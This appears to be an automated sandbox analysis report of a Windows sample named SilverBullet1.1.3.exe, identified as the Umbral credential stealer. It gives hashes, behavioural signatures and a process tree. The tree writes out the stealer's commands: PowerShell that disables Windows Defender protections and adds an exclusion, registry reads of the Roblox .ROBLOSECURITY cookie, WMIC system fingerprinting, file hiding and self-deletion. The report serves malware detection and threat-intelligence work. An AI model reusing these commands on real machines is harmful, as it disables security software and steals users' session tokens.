Analysis

  • max time kernel
    122s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    26-07-2024 20:42

General

  • Target

    SilverBullet1.1.3.exe

  • Size

    246KB

  • MD5

    cbcd362933c6c8a10a0a6d8c40bbb66a

  • SHA1

    4fc0ff8ec329b58c4220a577f694b96be0b874f8

  • SHA256

    15e11de5fdc18d4d1a9fe45e494887fe04087aae5a215c1bff4f8fa36b86e7fb

  • SHA512

    da01c53ac833edbbb5abbefa5a5da4de0cdd10c9c7469b58db6f14470bbfa6b19c2b335759045402807c549a2fc36495d5d0a4b0ce41cb12a203e2e3d0b1b617

  • SSDEEP

    6144:JloZM+rIkd8g+EtXHkv/iD4z6F+cCFdWcj+ctBIKzb8e1ma5i:7oZtL+EP8z6F+cCFdWcj+ctBIMFg

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SilverBullet1.1.3.exe
    "C:\Users\Admin\AppData\Local\Temp\SilverBullet1.1.3.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1616
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1784
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\SilverBullet1.1.3.exe"
      2⤵
      • Views/modifies file attributes
      PID:2740
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SilverBullet1.1.3.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2784
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2756
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2624
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:968
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:2876
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1008
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2064
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\SilverBullet1.1.3.exe" && pause
          2⤵
          • Deletes itself
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1880
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2504

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        221bc3ebc948e2ca3ae124d5af5c46ba

        SHA1

        f2a600a9734e3a6b0b5f38411231f0a89fbdcc61

        SHA256

        c14cfb2aaec198bc2db9832ee32535c9cf828f95433a9e6441eba12a26c7ec3a

        SHA512

        355d2d87b05178157045b1c9cae2cdf404e29b95b79534c0a84508f1dd80834c653d3cdd053c2830e72945d15149c60e7c16de98c84030b17a328a61a9c6670e

      • memory/1008-42-0x0000000002320000-0x0000000002328000-memory.dmp

        Filesize

        32KB

      • memory/1616-0-0x000007FEF5AB3000-0x000007FEF5AB4000-memory.dmp

        Filesize

        4KB

      • memory/1616-1-0x0000000000EF0000-0x0000000000F34000-memory.dmp

        Filesize

        272KB

      • memory/1616-2-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

        Filesize

        9.9MB

      • memory/1616-46-0x000007FEF5AB0000-0x000007FEF649C000-memory.dmp

        Filesize

        9.9MB

      • memory/2784-14-0x000000001B680000-0x000000001B962000-memory.dmp

        Filesize

        2.9MB

      • memory/2784-15-0x00000000027A0000-0x00000000027A8000-memory.dmp

        Filesize

        32KB

      • memory/2804-7-0x000000001B620000-0x000000001B902000-memory.dmp

        Filesize

        2.9MB

      • memory/2804-8-0x0000000001E70000-0x0000000001E78000-memory.dmp

        Filesize

        32KB